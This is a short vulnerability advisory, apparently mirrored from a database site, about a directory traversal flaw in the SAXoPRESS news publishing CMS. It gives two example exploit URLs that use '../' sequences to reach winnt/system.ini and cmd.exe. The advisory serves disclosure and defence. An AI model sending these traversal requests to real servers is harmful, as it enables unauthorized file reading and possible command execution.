Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12186
HistoryApr 12, 2006 - 12:00 a.m.

SAXoPRESS - directory traversal

2006-04-1200:00:00
vulners.com
16
JSON

SAXoPRESS is a content management system, mainly used for news publishing.

A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and possibly execute arbitrary commands.

Example exploit:
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe

Affected versions: unconfirmed

JSON